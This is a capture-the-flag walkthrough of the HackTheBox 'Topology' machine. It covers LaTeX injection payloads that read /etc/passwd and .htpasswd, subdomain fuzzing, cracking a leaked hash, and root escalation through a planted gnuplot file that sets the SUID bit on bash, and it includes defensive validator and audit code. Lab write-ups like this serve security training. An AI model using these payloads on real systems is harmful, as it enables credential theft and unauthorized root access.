HACKTHEBOX

Topology

Creating Host

sudo vim /etc/hosts

Add the host as 10.10.11.217 topology.htb

Link: http://topology.htb/

Scanning

nmap -A -sV 10.10.11.217

Visit http://topology.htb/

Found a LaTeX Equation Generator but couldn’t redirect, so adding this host name to /etc/hosts.

Had no idea about this website, so searched for LaTeX equation vulnerabilities and found Formula/CSV/Doc/LaTeX Injection - HackTricks.

Now I wanted to read files through the LaTeX code generator.

command: \input{/etc/passwd}

💡 It's a LaTeX language issue: when I execute the command it's in "text" mode; by adding $ it goes into "math mode" to calculate and execute equations.

command: $\input{/etc/passwd}$

As we know, the /etc/passwd file is used to keep track of every registered user that has access to a system.

command: $\lstinputlisting{/etc/passwd}$
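Seen from the side of whoever runs the equation generator, the inputs above are control sequences that have no place in a math expression. The following is an added example, not part of the original writeup or of the target application: an allowlist validator placed next to a blocklist that only knows `\input`. The function names, the allowlist contents and the blocklist itself are assumptions made for illustration.

```python
import re

# Assumed allowlist for an equation-only renderer (hypothetical; extend deliberately).
ALLOWED_COMMANDS = {
    "frac", "sqrt", "sum", "int", "prod", "lim", "infty", "cdot", "times",
    "left", "right", "alpha", "beta", "gamma", "theta", "pi", "sin", "cos",
    "log", "leq", "geq", "neq", "pm", "partial", "mathrm", "mathbf",
}
# One-character control symbols that only space or escape: \, \; \: \! \{ \} \_ \% \& \# \$
ALLOWED_SYMBOLS = set(",;:!{}_%&#$")
# A control sequence: backslash + letters (or '@'), backslash + one char, or a trailing backslash.
CONTROL_SEQ = re.compile(r"\\([A-Za-z@]+|.|\Z)", re.DOTALL)


def naive_blocklist_ok(expr):
    """Hypothetical weak filter for contrast: blocks only \\input."""
    return re.search(r"\\input(?![A-Za-z])", expr) is None


def validate_equation(expr, max_len=400):
    """Return (ok, reason); accept only allowlisted math control sequences."""
    if len(expr) > max_len:
        return False, "too long"
    if any(not (0x20 <= ord(c) <= 0x7E) for c in expr):
        return False, "non-printable or non-ASCII character"
    if "^^" in expr:
        # TeX's ^^xx notation can spell a backslash or letters indirectly.
        return False, "^^ character escape"
    for match in CONTROL_SEQ.finditer(expr):
        name = match.group(1)
        if name not in ALLOWED_COMMANDS and name not in ALLOWED_SYMBOLS:
            return False, "control sequence \\" + name + " not allowed"
    if "$" in CONTROL_SEQ.sub("", expr):
        # The renderer supplies math mode itself; user input must not toggle it.
        return False, "unescaped $ toggles math mode"
    return True, "ok"


if __name__ == "__main__":
    samples = [  # first entry is constructed; the other two are the writeup's inputs
        r"\frac{a}{b} + \sqrt{x^2}",
        r"\input{/etc/passwd}",
        r"$\lstinputlisting{/etc/passwd}$",
    ]
    for s in samples:
        print(s, "| blocklist passes:", naive_blocklist_ok(s), "| allowlist:", validate_equation(s))
```

Input filtering is only one layer: the renderer should also run TeX with shell escape disabled and file reads restricted (kpathsea's `openin_any = p` in texmf.cnf).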

Nothing much could be found here, let’s scan for some directories.

Scanning for Subdomains

Command: wfuzz -c --hc=404 --hw=545 -t 200 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.topology.htb" http://topology.htb

Add dev.topology.htb and stats.topology.htb to /etc/hosts

Now we need to bypass this authentication; as we have seen, this domain is running on Apache/2.4.41.

🔗 Bypass Apache/2.4.41 401 Unauthorized: https://www.vidocsecurity.com/blog/401-and-403-bypass-how-to-do-it-right/

Command: $\lstinputlisting{/var/www/dev/.htpasswd}$

Finally found a Hash as a .PNG file.

Hash: vdaisley : $apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0

Hash Cracking using John

command: john --wordlist=/usr/share/wordlists/rockyou.txt hash

Output ?:calculus20

As seen in our initial Nmap scan, we have a few SSH ports open.

Connect to SSH

command: ssh vdaisley@topology.htb

password: calculus20

For user flag

command: cat user.txt

Gaining Root access

Nothing interesting found here, except an executable “pspy64”.

💡 pspy is a command line tool designed to snoop on processes without need for root permissions.

command: ./pspy64

command: cd /opt/gnuplot

command: ls

Output: ls: cannot open directory '.': Permission denied

Create a file within gnuplot dir

command: nano /opt/gnuplot/root.plt
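An `ls` that fails with "Permission denied" in a directory where a file can still be created is what write and search permission without read permission looks like to a non-owner. The following is an added example, not part of the original writeup: an audit helper a defender can run over a tree to flag such directories, which matter wherever a privileged job reads files from them. The function names and the sample directory names are hypothetical.

```python
import os
import stat


def classify_dir(path):
    """Return a finding string if non-owners can create files in path, else None."""
    mode = os.lstat(path).st_mode
    if not stat.S_ISDIR(mode):
        return None
    # Creating an entry needs write AND search (execute) permission on the directory.
    if not (mode & stat.S_IWOTH and mode & stat.S_IXOTH):
        return None
    if mode & stat.S_ISVTX:
        return "world-writable (sticky bit set, as on /tmp)"
    if not mode & stat.S_IROTH:
        # Listing fails with "Permission denied", yet files can still be dropped.
        return "blind drop: others can create files but cannot list them"
    return "world-writable without sticky bit"


def audit_tree(root):
    """Return {path: 'mode finding'} for every flagged directory at or below root."""
    candidates = [root]
    for dirpath, dirnames, _files in os.walk(root):
        # dirnames also lists directories the auditor cannot descend into.
        candidates.extend(os.path.join(dirpath, d) for d in dirnames)
    findings = {}
    for path in candidates:
        finding = classify_dir(path)
        if finding:
            findings[path] = stat.filemode(os.lstat(path).st_mode) + " " + finding
    return findings


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:  # constructed sample tree
        for name, mode in [("plots", 0o733), ("www", 0o755), ("scratch", 0o1777)]:
            os.mkdir(os.path.join(tmp, name))
            os.chmod(os.path.join(tmp, name), mode)
        for path, finding in sorted(audit_tree(tmp).items()):
            print(path, finding)
```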

Reverse Shell - root.plt must contain system “chmod u+s”

command: bash -p

-p  Turned on whenever the real and effective user ids do not match.
            Disables processing of the $ENV file and importing of shell
            functions.  Turning this option off causes the effective uid and
            gid to be set to the real uid and gid.

command: whoami → root

Obtained root access. Now, move on to the root dir.

command: cd /root

ls

cat root.txt

Here is the root flag

Output: bb6b6780329a215d36126b6d6af62f1f